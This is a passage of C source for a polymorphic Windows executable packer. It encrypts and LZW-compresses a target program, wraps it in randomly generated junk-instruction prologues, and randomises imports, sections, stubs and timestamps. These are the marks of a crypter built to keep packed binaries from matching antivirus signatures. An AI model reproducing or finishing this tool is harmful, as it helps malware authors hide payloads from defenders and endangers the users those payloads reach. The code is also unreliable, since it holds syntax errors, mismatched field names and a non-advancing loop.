/*
  notes:
  block chains cannot be implemented in encryption procedure because
  prologue decrypts loader and attached exe continiously, but when
  exe is being generated, executable encrypted first;

  todo:
  a) improve code generation

  itable instruction size format changed:
  low nibble contains size
  high nibble contains size of random immediate operand but when
   highest bit of this nibble is set and size is 1, random value must
   be in range 2..31
*/

#include <windows.h>

#include "sm.h"
#include "pe.h"
#include "array.h"
#include "resource.h"
#include "stdlib.h"
#include "switches.h"

#include "smint.h"


/****************** misc basic routines ***********************************
*/

typedef struct TagCRYPTCTX {
  DWORD   val_a, val_b, val_c, val_d;
  DWORD   Index;
} CRYPTCTX;

static void Crypt( CRYPTCTX* Ctx, BYTE* Data, DWORD Size )
// Size must be multiple of 4; Data can be NULL - context will be prepared to
// continue encryption
// labuda
  {
    DWORD    i, s, Rnd;

    extern DWORD Random();
#   pragma aux Random = \
    "             imul  EAX,Rnd,08088405h   "\
    "             inc   EAX                 "\
    "             mov   Rnd,EAX             "\
      value[EAX];

    extern void ROL( DWORD* v );
#   pragma aux ROL = \
    "             rol   [EBX],1             "\
      parm[EBX];

    extern void ROR( DWORD* v );
#   pragma aux ROR = \
    "             ror   [EBX],1             "\
      parm[EBX];

    Rnd = Ctx->val_c;
    if( Data == NULL ) {
      switch( Ctx->Index & 15 ) {
        case 4: goto p1;
        case 8: goto p2;
        case 12: goto p3;
      }
      for( i = 0;; ) {
        i += 4; if( i >= Size ) break;
  p1:
        Random();
        i += 4; if( i >= Size ) break;
  p2:
        ROR( &Ctx->val_b );
        i += 4; if( i >= Size ) break;
  p3:
        ROL( &Ctx->val_a );
        i += 4; if( i >= Size ) break;
      }
    }
    else {
      switch( Ctx->Index & 15 ) {
        case 4: goto v1;
        case 8: goto v2;
        case 12: goto v3;
      }
      for( i = 0;; ) {
        *((DWORD*)(Data + i)) ^= Ctx->val_d;
        i += 4; if( i >= Size ) break;
  v1:
        *((DWORD*)(Data + i)) ^= Rnd;
        Random();
        i += 4; if( i >= Size ) break;
  v2:
        *((DWORD*)(Data + i)) ^= Ctx->val_b;
        ROR( &Ctx->val_b );
        i += 4; if( i >= Size ) break;
  v3:
        *((DWORD*) Data) ^= Ctx->val_a;
        ROL( &Ctx->val_a );
        i += 4; if( i >= Size ) break;
      }
    }
    Ctx->val_c = Rnd;
    Ctx->Index += Size;
  }

static int  GetStringCount( char* p )
// returns number of strings in the 0-terminated string table
  {
    int  c;

    for( c = 0; *p != 0; c++ ) p += lstrlen( p ) + 1;
    return c;
  }

static void RndFill( DWORD* Dest, DWORD DestSz, DWORD Range )
/*
  Fill table with unique random values in range 0..Range-1
*/
  {
    DWORD* Buf;
    DWORD  i, j, sz;

    // dumb implementation
    Buf = (DWORD*) LocalAlloc( LMEM_FIXED, sizeof( DWORD ) * Range );
    if( Buf == NULL ) {
      // error - simply initialize dest with sequental numbers
      for( i = 0; i < DestSz; i++ ) Dest[ i ] = i;
      return;
    }
    for( i = 0; i < Range; i++ ) Buf[ i ] = i;
    sz = Range;
    for( i = 0; i < DestSz; i++ ) {
      j = Rand() % sz;
      Dest[ i ] = Buf[ j ];
      RtlMoveMemory( &Buf[ j ], &Buf[ j + 1 ], (sz - j - 1) * sizeof(DWORD) );
      sz--;
    }
    LocalFree( Buf );
  }

static void SetRequiredImportIdx( char* FuncName,
                                  DWORD* ImpIdx, DWORD ImpCount,
                                  char* FuncTable[], DWORD FuncCount,
                                  DWORD* endpoint )
/*
  in: function name
      import index array  (filled by RndFill)
      size of array
      function names table
      table size
  in/out: endpoint position
  This function obtains index of required function in name table and
  checks whether index already in array;
  if index in array and its position greater than endpoint, moves it to
  endpoint;
  if array doesn't contain index, it will be set at endpoint position;
  endpoint is incremented once or twice before any operation;
*/
  {
    DWORD  i, k;

    // don't touch import table before endpoint

    *endpoint += 1 + (Rand() & 1);

    // determine function index

    for( i = 0; i < FuncCount; i++ )
      if( lstrcmpi( FuncName, FuncTable[ i ] ) == 0 ) break;

    // find function index in import table

    for( k = 0; k < ImpCount; k++ )
      if( ImpIdx[ k ] == i ) {

        // function already in the table - swap it to endpoint position
        // if it is after endpoint

        if( k <= *endpoint ) {
          Dbg4( "required %s:%d is at position %d, endpoint is %d - no special care", FuncName, i, k, *endpoint );
          return;
        }
        Dbg4( "required %s:%d is at position %d, but endpoint is %d - swap", FuncName, i, k, *endpoint );
        ImpIdx[ k ] = ImpIdx[ *endpoint ];
        ImpIdx[ *endpoint ] = i;
        return;
      }

    Dbg3( DbgMsg, "required %s:%d is not in table, adding at endpoint %d", FuncName, i, *endpoint );
    ImpIdx[ *endpoint ] = i;
  }

static DWORD GetImpFuncNamesLength( char* FuncNames[],
                                    DWORD* ImpIdx, DWORD ImpCount )
/*
  in: table with function names
      import index array
      size of array
  this function returns total length of function names;
  this is used to calculate size of for idata section
*/
  {
    DWORD  i, c;

    for( c = i = 0; i < ImpCount; i++ )
      c += lstrlen( FuncNames[ ImpIdx[ i ] ] ) + 3; // 2 bytes before name + \0
    return c;
  }

static BOOL FileRead( HANDLE Fh, void* Buf, DWORD Len )
  {
    DWORD  j;

    if( ! ReadFile( Fh, Buf, Len, &j, NULL ) ) {
      Dbg2( "cannot read %d bytes from file, error %d", Len, GetLastError() );
      return FALSE;
    }
    if( j != Len ) {
      Dbg1( "cannot read %d bytes from file - end of file", Len );
      return FALSE;
    }
    return TRUE;
  }

static BOOL FileWrite( HANDLE Fh, void* Buf, DWORD Len )
  {
    DWORD  j;

    if( ! WriteFile( Fh, Buf, Len, &j, NULL ) ) {
      Dbg2( "cannot write %d bytes to file, error %d", Len, GetLastError() );
      return FALSE;
    }
    if( j != Len ) {
      Dbg1( "cannot write %d bytes to file - disk full?", Len );
      return FALSE;
    }
    return TRUE;
  }

static BOOL FileSeek( HANDLE Fh, DWORD Position )
  {
    if( SetFilePointer( Fh, 0, NULL, FILE_BEGIN ) != 0 ) {
      Dbg( "cannot set file pointer, error %d", GetLastError() );
      return FALSE;
    }
    return TRUE;
  }

static BOOL FileWriteRandom( DWORD Position, HANDLE Fh, DWORD Size )
  {
    BYTE    Buf[512];
    DWORD   i, j, Written;

    if( SetFilePointer( Fh, Position, NULL, FILE_BEGIN ) != Position )
      return FALSE;

    // write randoms
    Written = 0;
    while( Written < Size ) {
      j = Size - Written; if( j > 512 ) j = 512;
      for( i = 0; i < j; i++ ) Buf[ i ] = (BYTE) Rand();
      if( ! FileWrite( Fh, Buf, j ) ) return FALSE;
      Written += j;
    }
    // now align
    Size = ((Size + FILE_ALIGNMENT - 1) & ~(FILE_ALIGNMENT - 1)) - Size;
    i = 0;
    RtlZeroMemory( Buf, 512 );
    while( i < Size ) {
      j = Size - i; if( j > 512 ) j = 512;
      if( ! FileWrite( Fh, Buf, j ) ) return FALSE;
      i += j;
    }
    return TRUE;
  }

static void* MemAlloc( DWORD Size )
  {
    void*  p;

    p = (void*) LocalAlloc( LMEM_FIXED, Size );
    if( p == NULL ) Dbg1( "cannot allocate %d bytes", Size );
    return p;
  }

static void* MemRealloc( void* Pointer, DWORD Size )
  {
    void*  p;

    p = (void*) LocalReAlloc( (HLOCAL) Pointer, Size, 0 );
    if( p == NULL ) Dbg1( "cannot reallocate %d bytes", Size );
    return p;
  }

static void MemFree( void* Pointer )
  {
    LocalFree( (HLOCAL) Pointer );
  }

static DWORD GetKernelTimeStamp( FILETIME* Tm )
  {
    HANDLE     Fh;
    DWORD      Rc;
    DWORD      Buf[3];
    char       FileName[ MAX_PATH ];
    IMAGE_DOS_HEADER FHdr;

    Dbg( "obtaining data/time and timestamp of kernel32" );

    GetSystemDirectory( FileName, MAX_PATH - 14 );
    lstrcat( FileName, "\\kernel32.dll" );
    Fh = CreateFile( FileName, GENERIC_READ, FILE_SHARE_READ,
                     NULL, OPEN_EXISTING, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
      Dbg1( " cannot open %s", FileName );
      return 0;
    }
    Rc = 0;
    if( ! GetFileTime( Fh, NULL, NULL, Tm ) )
      Dbg1( "cannot get time of %s", FileName );
    else if( FileRead( Fh, &FHdr, sizeof(FHdr) ) ) {
      if( SetFilePointer( Fh, FHdr.e_lfanew,
                          NULL, FILE_BEGIN ) != FHdr.e_lfanew )
        Dbg( "cannot seek to %d", FHdr.e_lfanew );
      else if( FileRead( Fh, Buf, sizeof(Buf) ) ) {
        if( Buf[0] != IMAGE_NT_SIGNATURE ) {
           Dbg( "file %s doesn't contain PE signature" );
        else
          Rc = Buf[2];
      }
    }
    CloseHandle( Fh );
    return Rc;
  }


/********************** Relocations ***************************************
*/

static void EndUpRelocationBlock( EXEDEF* ExeDef )
  {
    if( ExeDef->RelocBufIdx & 3 ) { // pad block to DWORD
      *((WORD*)(ExeDef->RelocBuf + ExeDef->RelocBufIdx)) = 0;
      ExeDef->RelocBufIdx += 2;
    }
    // set block size
    *((DWORD*)(ExeDef->RelocBuf + ExeDef->RelocBlockStart + 4)) =
          ExeDef->RelocBufIdx - ExeDef->RelocBlockStart;
    // set virtual address
    *((DWORD*)(ExeDef->RelocBuf + ExeDef->RelocBlockStart)) =
          ExeDef->RelocLastVA;
    Dbg2( "relocations: VA %08X - end, size %08X",
          ExeDef->RelocLastVA, ExeDef->RelocBufIdx - ExeDef->RelocBlockStart );
  }

static void AddRelocation( DWORD Address, EXEDEF* ExeDef )
/*
  adds relocation element to reloc section
*/
  {
    DWORD  Offset;

    Offset = Address & 4095;
    Address &= ~4095;
    if( Address != ExeDef->RelocLastVA ) {
      if( ExeDef->RelocBufIdx != 0 ) EndUpRelocationBlock( ExeDef );
      // begin new block
      Dbg3( "relocations: VA %08X (%08X) - begin at %08X",
            Address, Offset, ExeDef->RelocBufIdx );
      ExeDef->RelocLastVA = Address;
      ExeDef->RelocBlockStart = ExeDef->RelocBufIdx;
      ExeDef->RelocBufIdx += 8;
    }
    *((WORD*)(ExeDef->RelocBuf
              + ExeDef->RelocBufIdx)) = (WORD)(0x3000 + Offset);
    ExeDef->RelocBufIdx += 2;
  }


/********************** Code generator ************************************
*/

static int GetInstructionIndex( INSTRUCTION* ITable, int ICount, BYTE ModFlag )
/*
  returns index of instruction that doesn't violate
  registers modification requirements
*/
  {
    int  i, j;

    // first, try randomly 8 times
    for( j = 0; j < 8; j++ ) {
      i = Rand() % ICount;
      if( (ITable[ i ].ModFlag & ModFlag) == 0 ) return i;
    }

    // finally, scan (forward or backward)
    j = i & 1;
    while( (ITable[ i ].ModFlag & ModFlag) != 0 ) {
      if( j ) {
        if( ++i == ICount ) i = 0;
      }
      else {
        if( --i < 0 ) i = ICount - 1;
      }
    }
    return i;
  }

static DWORD GenerateDummyBlock( DWORD Ip, DWORD endpoint,
                                 BYTE ModFlag, EXEDEF* ExeDef )
  {
    DWORD  i, vaddr;
    BYTE   j, s, v;

    while( Ip < endpoint ) {

      // the room for improvements <todo>
      v = Rand();
      if( v & 3 )
        i = GetInstructionIndex( ITable, ITableSize, ModFlag );
      else
        if( v & 1 )
          i = GetInstructionIndex( ITable, ITableOftCount, ModFlag );
        else
          i = GetInstructionIndex( ITable, ITableI32Count, ModFlag );

      // copy instruction

      s = ITable[ i ].Sz & 15;
      for( j = 0; j < s; j++ )
        ExeDef->Code[ Ip++ ] = ITable[ i ].Instr[ j ];

      // append random immediate operand (prefer FFFFFFXX)

      s = Ld->ITable[ i ].Sz >> 4;
      if( (s & 7) == 1 )
        if( (s & 8) != 0 ) {
          v = Rand() & 31;
          if( v < 2 ) v = 2;
          ExeDef->Code[ Ip++ ] = v;
        }
        else
          ExeDef->Code[ Ip++ ] = Rand();
      else {
        if( Rand() & 3 )
          *((DWORD*)(ExeDef->Code + Ip)) = Rand() | 0xFFFFFF00;
        else
          *((DWORD*)(ExeDef->Code + Ip)) = Rand();
        Ip += 4;
      }
    }
    return Ip;
  }

static void GeneratePrologue( EXEDEF* ExeDef )
  {
    DWORD  Ip, i, j, BlockSize;
    BYTE   ModFlag;
    static BYTE OneByteInstructions[] = {
               0x90, 0x37, 0x3F, 0x27, 0x2F, 0x90, 0x90, 0x90, 0x90, 0x90 };

    BlockSize = ExeDef->DummyCodeSize / (ExeDef->PrologueSize + 3);

    // init instruction pointer and generate first dummy blocks

    Dbg1( "generating 1st block (block size %d)", BlockSize );
    Ip = GenerateDummyBlock( 0, BlockSize, 0, ExeDef );
    ExeDef->EntryPoint = Ip;
    Dbg1( "entry point %08X", Ip );
    Dbg1( "generating 2nd block (block size %d)", BlockSize );
    Ip = GenerateDummyBlock( Ip, BlockSize * 2, 0, ExeDef );

    // generate next blocks

    ModFlag = 0;
    for( i = 0; i < ExeDef->PrologueSize; i++ ) {
      j = (i + 2) * BlockSize + Rand() % BlockSize;
      Dbg2( "generating block %d (endpoint %d)", i + 1, j );
      Ip = GenerateDummyBlock( Ip, j, ModFlag, ExeDef );
      ExeDef->P_IP[ i ] = Ip;
      ModFlag = ExeDef->Prologue[ i ].Instr.ModFlag;
      Dbg2( "instruction %d offset %08X", i, Ip );

      // copy instruction

      for( j = 0; j < ExeDef->Prologue[ i ].Instr.Sz; j++ )
        ExeDef->Code[ Ip++ ] = ExeDef->Prologue[ i ].Instr.Instr[ j ];
    }

    // generate last block

    Ip = GenerateDummyBlock( Ip, ExeDef->DummyCodeSize, 0, ExeDef );

    // align

    while( Ip & 15 )
      ExeDef->Code[ Ip ] = OneByteInstructions[
                               Rand() % sizeof( OneByteInstructions ) ];

    ExeDef->CodeSize = Ip;
  }

static DWORD GetIATIndex( EXEDEF* ExeDef, IMPORENTRY* ie )
  {
    DWORD  f, i, j, k;

    for( f = i = 0; i < ExeDef->ImportModuleCount; i++ ) {
      j = ExeDef->ImportModuleOrder[ i ];
      if( 0 < j-- ) // not winsock
        if( lstrcmpi( ExeDef->Imports[ j ].ModuleName, ie->ModuleName ) == 0 ) {
          for( k = 0; k < ExeDef->ImportFunctionCount[ i ]; k++ ) {
            if( lstrcmpi( ExeDef->Imports[ j ].FuncNames[
                             ExeDef->ImportFunctionIndex[ j ][ k ] ],
                          ie->FunctionName ) == 0 ) {
              return f;
            }
            f++;
          }
        }
      f += ExeDef->ImportFunctionCount[ i ];
    }
    Dbg2( "GetIATIndex: %s:%s not found; hangup", ie->ModuleName, ie->FunctionName );
    for( i = 1; i < 2; i++ ) i--;
    return 0;
  }

static void TunePrologue( EXEDEF* ExeDef )
  {
    DWORD  i, Ip;
    INSTRUCTION2*  inst;

    Dbg( "tuning prologue code" );
    for( i = 0; i < ExeDef->PrologueSize; i++ ) {
      Ip = ExeDef->P_IP[ i ];
      inst = ExeDef->Prologue + i;
      switch( ExeDef->Prologue[ i ].Type ) {
        case IT_JUMP:
          // calculate relative offset
          *((DWORD*)(ExeDef->Code + Ip + 2)) =
                       ExeDef->P_IP[ ExeDef->Prologue[ i ].Value ]
                       - (Ip + inst->Instr.Sz);
          Dbg2( "instruction %d, jump to %d", i, inst->Value );
          break;
        case IT_CALL:
          // determine index (j) in IAT
          j = GetIATIndex( ExeDef, ExeDef->PrologueImports + inst->Value );
          // now we can determine offset of jump instruction
          j = j * 6 + ExeDef->IATOffset;
          // and calculate relative offset
          *((DWORD*)(ExeDef->Code + Ip + 1)) = j - (Ip + inst->Instr.Sz);
          Dbg3( "instruction %d, call to %s:%s", i,
                ExeDef->PrologueImports[ inst->Value ].ModuleName,
                ExeDef->PrologueImports[ inst->Value ].FunctionName );
          break;
        case IT_CBEGIN:
          AddRelocation( Ip + Inst->Value
                         + ExeDef->Sections[0].VirtualAddress, ExeDef );
          Dbg1( "instruction %d, relocation element added", i );
          break;
        case IT_XOR:
          *((DWORD*)(ExeDef->Code + Ip + (inst->Value >> 4))) =
                                      ExeDef->Keys[ inst->Value & 15 ];
          Dbg2( "instruction %d, key %02X", i, inst->Value );
          break;
        case I2T_CONST:
          *((DWORD*)(ExeDef->Code + Ip + inst->Value)) =
                                      0x08088405 ^ ExeDef->Keys[ 0 ];
          Dbg2( "instruction %d, constant", i );
          break;
        case I2T_CSIZE:
          *((DWORD*)(ExeDef->Code + Ip + inst->Value)) =
                                ExeDef->EncryptedCodeSize ^ ExeDef->Keys[ 1 ];
          Dbg2( "instruction %d, code size", i );
          break;
      }
    }
  }

static void TuneLoader( EXEDEF* ExeDef )
  {
    DWORD  i, j, ImpOffset;
    LDRIMPORENTRY*  le;
    CRYPTCTX  cx;

    // copy loader code and tune loader's jump table

    Dbg1( "tuning loader code (offset %08X)", ExeDef->CodeSize );

    RtlMoveMemory( ExeDef->Code + ExeDef->CodeSize,
                   ExeDef->LdrCode, ExeDef->LdrCodeSize );

    ImpOffset = ExeDef->CodeSize + ExeDef->LdrImportsOffset;
    le = (LDRIMPORTENTRY*)(ExeDef->Code + ImpOffset);
    for( i = 0; i < ExeDef->LdrImportsSize; i++ ) {
      // determine index (j) in IAT
      j = GetIATIndex( ExeDef, &le->Destination );
      // now we can determine offset of jump instruction
      j = j * 6 + ExeDef->IATOffset;
      // and calculate relative offset
      le->RelativeAddress = j - (ImpOffset + i * sizeof(LDRIMPORENTRY) + 5);
    }

    // encrypt loader

    cx.val_a = ExeDef->Keys[0];
    cx.val_b = ExeDef->Keys[1];
    cx.val_c = ExeDef->Keys[2];
    cx.val_d = ExeDef->Keys[3];
    cx.Index = 0;
    Crypt( &cx, ExeDef->Code + ExeDef->CodeSize, ExeDef->LdrCodeSize );
  }


/************************************************************************
*/

static BOOL WriteStub( EXEDEF* ExeDef, BOOL UseOriginalStub )
/*
  this function writes stub and sets PEHdrOffset in ExeDef
*/
  {
    BYTE*  Stub;
    DWORD  SSz, i;

    if( UseOriginalStub ) {
      Stub = ExeDef->Src;
      SSz = (PIMAGE_DOS_HEADER) Stub->e_lfanew;
    }
    else {
      i = Rand() % STUB_COUNT;
      Stub = Stubs[ i ];
      SSz = StubSz[ i ];
    }
    Dbg( "writing stub" );
    if( ! FileSeek( ExeDef->HOut, 0 ) ) return FALSE;
    if( ! FileWrite( ExeDef->HOut, Stub, SSz ) ) return FALSE;
    ExeDef->PEhdrOffset = SSz;
    return TRUE;
  }

typedef struct TagAPPENDCTX { // context for lzw compressor callback
  HANDLE    HOut;
  DWORD     Counter;
  CRYPTCTX  CryptCtx;
  BOOL      Multiple4;
} APPENDCTX;

static BOOL AppendBlock( APPENDCTX* Ctx, void* Buf, DWORD BufSize )
// callback for lzw compressor
  {
    if( ! Ctx->Multiple4 ) { // can be set only for last block
      Dbg( "AppendBlock: data size is not multiple of 4" );
      return FALSE;
    }
    Ctx->Multiple4 = ! (BufSize & 3);
    BufSize = (BufSize + 3) & ~3;
    Ctx->Counter += BufSize;
    Crypt( &Ctx->CryptCtx, Buf, BufSize );
    return FileWrite( Ctx->HOut, Buf, BufSize );
  }

static BOOL AppendSourceFile( EXEDEF* ExeDef )
/*
  ExeDef->EncryptedCodeSize,
  ExeDef->IATOffset
     will be set on exit
*/
  {
    LZWCTX     LzwCtx;
    APPENDCTX  ACtx;
    DWORD      Rnds[4];
    DWORD      i;

    Dbg( "appending source file" );
    if( ! FileSeek( ExeDef->HOut,
                    ExeDef->OptHdr.SizeOfHeaders
                    + ExeDef->CodeSize + ExeDef->LdrCodeSize ) ) return FALSE;
    /* compress source file
       we'll get output data size in ACtx->Count
    */
    ACtx.HOut = ExeDef->HOut;
    ACtx.Count = 0;
    ACtx.Multiple = TRUE;
    ACtx.CryptCtx.val_a = ExeDef->Keys[0];
    ACtx.CryptCtx.val_b = ExeDef->Keys[1];
    ACtx.CryptCtx.val_c = ExeDef->Keys[2];
    ACtx.CryptCtx.val_d = ExeDef->Keys[3];
    ACtx.CryptCtx.Index = 0;
    Crypt( &ACtx.CryptCtx, NULL, ExeDef->LdrCodeSize );  // skip loader code
    if( ! LZW_Compress( &LzwCtx, ExeDef->Src, ExeDef->SrcSize,
                        (LZWCALLBACK) AppendBlock, &ACtx ) ) return FALSE;

    /* ok, append 16 random bytes (because prologue code decrypts 16 byte
       blocks)
    */
    for( i = 0; i < 4; i++ ) Rnds[ i ] = Rand();
    if( ! FileWrite( ExeDef->HOut, Rnds, 16 ) ) return FALSE;
    ExeDef->IATOffset = ExeDef->CodeSize
                         + ExeDef->LdrCodeSize + ACtx.Count + 16;
    ExeDef->EncryptedCodeSize = ExeDef->IATOffset & ~15;
    return TRUE;
  }

static void DefineSectionOrder( EXEDEF* ExeDef )
  {
    DWORD  Order[ MAX_SECTIONS ];
    DWORD  i, j;

    Dbg( "defining sections" );

    /* code section is always first; define presence of rdata and data
       and define order of rdata, data, bss, idata
    */
    i = 0;
    Order[ i++ ] = SECTION_BSS;
    Order[ i++ ] = SECTION_IDATA;
    if( Rand() & 1 ) {
      Order[ i++ ] = SECTION_RDATA; // +rdata
      Dbg( ".rdata included" );
    }
    if( Rand() & 1 ) {
      Order[ i++ ] = SECTION_DATA;  // +data
      Dbg( ".data included" );
    }
    RndCopy( ExeDef->SectionOrder, i, Order, i );
    ExeDef->FileHdr.NumberOfSections = i + 1;

    /* define order of reloc and rsrc
    */
    j = 0;
    Order[ j++ ] = SECTION_RELOC;
    if( ExeDef->SrcRsrc != NULL ) {
      Order[ j++ ] = SECTION_RSRC;  // +rsrc
      Dbg( ".rsrc included" );
    }
    RndCopy( &ExeDef->SectionOrder[ i ], j, Order, j );
    ExeDef->FileHdr.NumberOfSections += j;

    Dbg1( "number of sections: %d", ExeDef->FileHdr.NumberOfSections );
  }

static DWORD GetSrcWinsockIdataSize( ExeDef )
  {
    DWORD  *nameaddr, *addraddr;
    DWORD  Size, V i, j;

    V = GetRvaToVaValue( ExeDef->Src,
            PEfileDirectoryEntryToSectionHeader( ExeDef->Src,
                                          IMAGE_DIRECTORY_ENTRY_IMPORT ) );
    nameaddr = ExeDef->Src +
                  ExeDef->WinsockImpDirEntry->dwRVAFunctionNameList + V;
    addraddr = ExeDef->Src +
                  ExeDef->WinsockImpDirEntry->dwRVAFunctionAddressList + V;
    Size = sizeof(IMAGE_IMPORT_MODULE_DIRECTORY);
    for( i = 0; *nameaddr != 0; i++, nameaddr++, addraddr++ ) {
      Size += 2 * sizeof(DWORD);
      j = *addraddr;
      if( ! (0x80000000 & j) ) Size += 3 + lstrlen( ExeDef->Src + j + V );
    }
    Dbg1( "winsock idata size %d", Size );
    return Size;
  }

static BOOL DefineIdata( EXEDEF* ExeDef )
  {
    DWORD  Order[ MAX_IMPORT_MODULES ];
    DWORD  i, j, n, s, RequiredModule;
    IMPORTENTRY*  p;

    Dbg( "defining import tables" );
    i = 0; // module count

    /* check for winsock
    */
    if( (ExeDef->WinsockImpDirEntry =
           fileGetImportDirectoryEntry( ExeDef->Src,
                                        "wsock32.dll" )) != NULL ) {
      Order[ i++ ] = 0;
      Dbg( "winsock found" );
    }

    /* -- we know that kernel32 only is required for win32
          and ntdll only is required for native;
          and we know that these modules are first in imports table
       <todo>
    */
    n = ExeDef->ImportsSize;
    for( j = i; j < n; j++ ) Order[ j ] = j - i + 1;
    i++;

    /* mix and truncate list
    */
    if( n > 1 ) {
      RndCopy( &ExeDef->ImportModuleOrder[ i ], n - i,  // first, build
               &Order[ i ], n - i );                    // complete list
      if( (ExeDef->ImportModuleCount = Rand() % n) < i );
        ExeDef->ImportModuleCount = i;
      i = ExeDef->ImportModuleCount;
      RndCopy( Order, i, ExeDef->ImportModuleOrder, i );
      RtlMoveMemory( ExeDef->ImportModuleOrder, Order, i * sizeof(DWORD) );
    }

    /* define function count for each module
    */
    Dbg( "modules:" );
    ExeDef->TotalImports = 0;
    for( i = 0; i < ExeDef->ImportModuleCount; i++ ) {
      j = ExeDef->ImportModuleOrder[ i ];
      if( j == 0 ) { // winsock - take count from source
        ExeDef->ImportFunctionCount[ i ] =
            fileGetImportFunctionCount( ExeDef->Src,
                                        ExeDef->WinsockImpDirEntry );
        Dbg1( "  wsock32.dll: %d functions", ExeDef->ImportFunctionCount[ i ] );
      }
      else if( j == 1 ) {
        // -- we know that required module is the first and function count
        //    in table much more than required <todo>
        RequiredModule = i;
        ExeDef->ImportFunctionCount[ i ] = ExeDef->PrologueImportsSize
                                                + ExeDef->LdrImportsSize;
        ExeDef->ImportFunctionCount[ i ] +=
               ExeDef->DummyCodeSize *
                            (Rand() % ExeDef->Imports[ 0 ].FuncCount) /
                                   MAX_DUMMY_CODE_SIZE;
        if( ExeDef->ImportFunctionCount[ i ] > ExeDef->Imports[ 0 ].FuncCount )
          ExeDef->ImportFunctionCount[ i ] = ExeDef->Imports[ 0 ].FuncCount;
        Dbg3( "  %s: %d functions of %d", ExeDef->Imports[ 0 ].ModuleName,
              ExeDef->ImportFunctionCount[ i ] );
      }
      else if( Rand() % 1 ) {
        ExeDef->ImportFunctionCount[ i ] =
               ExeDef->DummyCodeSize *
                            (Rand() % ExeDef->Imports[ j - 1 ].FuncCount) /
                                   MAX_DUMMY_CODE_SIZE;
        Dbg3( "  %s: %d functions of %d", ExeDef->Imports[ j - 1 ].ModuleName,
              ExeDef->ImportFunctionCount[ i ] );
      }
      ExeDef->TotalImports += ExeDef->ImportFunctionCount[ i ];
    }
    Dbg1( "total number of functions: %d", ExeDef->TotalImports );

    /* allocate buffer and define values
    */
    Dbg( "allocating buffers" );
    if( ((ExeDef->ImportFunctionIndex[0] =
                  (DWORD*) MemAlloc( ExeDef->TotalImports
                                          * sizeof(DWORD)
                                     + ExeDef->TotalImports * 6 )) == NULL )
      return FALSE;
    RndFill( ExeDef->ImportFunctionIndex[0],
             ExeDef->ImportFunctionCount[0],
             ExeDef->Imports[ ExeDef->ImportModuleOrder[0] ] );
    // set pointers
    j = ExeDef->ImportFunctionCount[ 0 ];
    for( i = 1; i < ExeDef->ImportModuleCount; i++ ) {
      ExeDef->ImportFunctionIndex[ i ] = 
                     ExeDef->ImportFunctionIndex[ 0 ] + j;
      RndFill( ExeDef->ImportFunctionIndex[ i ],
               ExeDef->ImportFunctionCount[ i ],
               ExeDef->Imports[ ExeDef->ImportModuleOrder[ i ] ] );
      j += ExeDef->ImportFunctionCount[ i ];
    }
    ExeDef->IATBuf = (BYTE*) (ExeDef->ImportFunctionIndex[ 0 ] + j);

    /* set required imports 
       look up in the first table <todo>
    */
    Dbg( "setting required imports" );
    p = (IMPORTENTRY*)(ExeDef->LdrCode + ExeDef->LdrImportsOffset);
    for( i = j = 0; i < ExeDef->LdrImportsSize; i++, p++ )
      SetRequiredImportIdx( p->Function,
                            ExeDef->ImportFunctionIndex[ RequiredModule ],
                            ExeDef->ImportFunctionCount[ RequiredModule ],
                            ExeDef->Imports[ 0 ].FuncNames,
                            ExeDef->Imports[ 0 ].FuncCount, &j );
    p = ExeDef->PrologueImports;
    for( i = 0; i < ExeDef->PrologueImportsSize; i++ )
      SetRequiredImportIdx( p->Function,
                            ExeDef->ImportFunctionIndex[ RequiredModule ],
                            ExeDef->ImportFunctionCount[ RequiredModule ],
                            ExeDef->Imports[ 0 ].FuncNames,
                            ExeDef->Imports[ 0 ].FuncCount, &j );

    /* now calculate size of idata section
    */
    ExeDef->IdataSize = 0;
    for( i = 0; i < ImportModuleCount; i++ ) {
      j = ExeDef->ImportModuleOrder[ i ];
      if( j == 0 )  // winsock - obtain from source executable
        ExeDef->IdataSize += GetSrcWinsockIdataSize( ExeDef );
      else {
        j--;
        n = ExeDef->ImportFunctionCount[ j ];
        s = GetImpFuncNamesLength( ExeDef->Imports[ j ].FuncNames,
                                   ExeDef->ImportFunctionIndex[ j ], n )
                             + n * 2 * sizeof(DWORD) // address + name lists
                             + sizeof(IMAGE_IMPORT_MODULE_DIRECTORY);
        ExeDef->IdataSize += s
        Dbg2( "%s idata size %d", ExeDef->Imports[ j ].ModuleName, s );
      }
    }
    Dbg1( "total idata size %d", ExeDef->IdataSize );
    ExeDef->SplitNameAddr = Rand() % 1;
    Dbg1( "split name/address %d", ExeDef->SplitNameAddr );
    return TRUE;
  }

static BOOL DefineSections()
/*
  also write .data and .rdata; set SizeOfCode, BaseOfCode,
  SizeOfUninitializedData
*/
  {
    IMAGE_SECTION_HEADER*  sh, Bssh;
    DWORD  i, VA, Offset, BssIdx;
    int    Diff, DataSize;

    /* code section
    */
    sh = &ExeDef->Sections[0];
    lstrcpy( sh->Name, CodeSectionNames[ Rand() % CodeSectionNamesCount ] );
    sh->SizeOfRawData = (ExeDef->IATOffset + 6 * ExeDef->TotalImports
                           + FILE_ALIGNMENT - 1) & ~(FILE_ALIGNMENT - 1);
    sh->VirtualAddress = (ExeDef->OptHdr.SizeOfHeaders + SECTION_ALIGNMENT - 1)
                                            & ~(SECTION_ALIGNMENT - 1);
    sh->PointerToRawData = ExeDef->OptHdr.SizeOfHeaders;
    sh->Characteristics = 0x60000020;
    ExeDef->OptHdr.BaseOfCode = sh->VirtualAddress;
    ExeDef->OptHdr.SizeOfCode = sh->SizeOfRawData;
    Dbg3( "code section VA %08X, raw data offset %08X, raw data size %08X bytes",
          sh->VirtualAddress, sh->PointerToRawData, sh->SizeOfRawData );

    /* calculate difference between original image size
       and code size that we have got
    */
    Diff = ((ExeDef->OptHdr.SizeOfImage // size of original image
                 + SECTION_ALIGNMENT - 1)
                     & ~(SECTION_ALIGNMENT - 1))
           - ((sh->VirtualAddress + sh->SizeOfRawData
                 + 2 * SECTION_ALIGNMENT - 1)    // take .reloc into account
                     & ~(SECTION_ALIGNMENT - 1));
    if( ExeDef->SrcRsrc )
      Diff -= (ExeDef->SrcRsrc->SizeOfRawData + SECTION_ALIGNMENT - 1)
                     & ~(SECTION_ALIGNMENT - 1);
    if( Diff < 0 ) Diff = 0;

    /* other sections except last .reloc and .rsrc
    */
    VA = (sh->VirtualAddress + sh->SizeOfRawData + SECTION_ALIGNMENT - 1);
                                           & ~(SECTION_ALIGNMENT - 1);
    Offset = sh->PointerToRawData + sh->SizeOfRawData;
    DataSize = 0;
    Bssh = NULL;
